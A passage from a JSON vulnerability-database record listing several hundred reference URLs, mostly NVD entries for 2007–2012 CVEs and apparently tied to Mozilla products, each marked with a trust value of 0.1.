"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5024"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0468"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3026"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1203"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0074"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2061"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0085"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3980"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1966"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1945"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4184"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1959"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4060"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0077"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3000"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0071"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0068"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1974"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-0016"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2065"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4066"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0081"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4063"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1955"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1302"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5503"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3374"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3968"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1028"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4059"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3005"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4185"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2986"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0176"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5839"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1121"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3661"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2765"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5913"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3169"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5843"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3663"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3651"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5016"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2372"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1951"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3274"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1197"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3964"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1953"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4067"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2997"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3778"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2996"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3232"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0061"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4063"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-3073"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2654"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0354"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5500"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3380"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1212"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0357"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1976"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0773"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0220"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0071"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0777"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0055"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5052"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0165"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2464"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2378"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3131"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0160"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1836"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5513"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3986"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-0367"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2752"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3388"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2469"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2753"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3650"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3002"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2764"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3983"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2751"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4190"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2477"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1833"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3389"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2981"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2768"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2991"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0358"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2373"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3670"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3987"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3976"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4582"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3377"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4208"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1956"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4186"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0441"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0054"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3166"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-5014"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2370"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2671"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2662"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1309"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1840"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3957"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1585"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5840"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1207"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0445"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2998"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0355"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1200"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2362"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3077"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0056"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2987"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3101"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5501"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4195"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4209"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3985"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1962"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3660"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2762"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5833"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1839"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2988"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0648"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3101"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3168"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0072"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2995"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3399"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0171"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2983"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5841"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5838"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5019"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2985"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0458"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3073"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3659"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3837"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0066"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-3836"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0174"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5842"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0457"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3176"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5511"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0356"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4205"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0178"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3379"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4064"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4508"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2011/mfsa2011-34.html"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1310"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-0016"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1967"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1306"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3079"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2471"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0073"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0474"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0444"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0455"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1954"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4062"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3647"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4210"
},
{
"trust": 0.1,
"url": "http://blog.mozilla.org/security/2011/03/22/firefox-blocking-fraudulent-c="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-0017"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1305"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0446"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5835"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3966"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0181"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0069"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5013"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3979"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0450"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1214"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1196"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0449"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0062"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1841"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3179"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-0367"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3765"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1947"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3070"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4060"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3992"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1563"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0442"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0175"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-1712"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1199"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2365"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2404"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3775"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1198"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2535"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1938"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5505"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1946"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5512"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-5074"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4187"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3766"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2437"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1949"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3776"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5830"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0075"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1202"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0652"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1958"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5015"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0163"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4069"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0179"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1313"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0159"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1939"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3972"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3182"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4207"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-6961"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2990"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3970"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3178"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2671"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4069"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3180"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4191"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3956"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4204"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2763"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2982"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3986"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3654"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2364"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3389"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2980"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3963"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0464"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1209"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2754"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2470"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2210"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-1202"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5829"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3982"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3173"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3774"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3995"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5510"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4192"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2463"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0467"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1964"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3959"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3770"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3769"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0772"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3665"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4196"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5822"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2466"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3649"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3653"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3768"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2478"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3988"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1312"
},
{
"trust": 0.1,
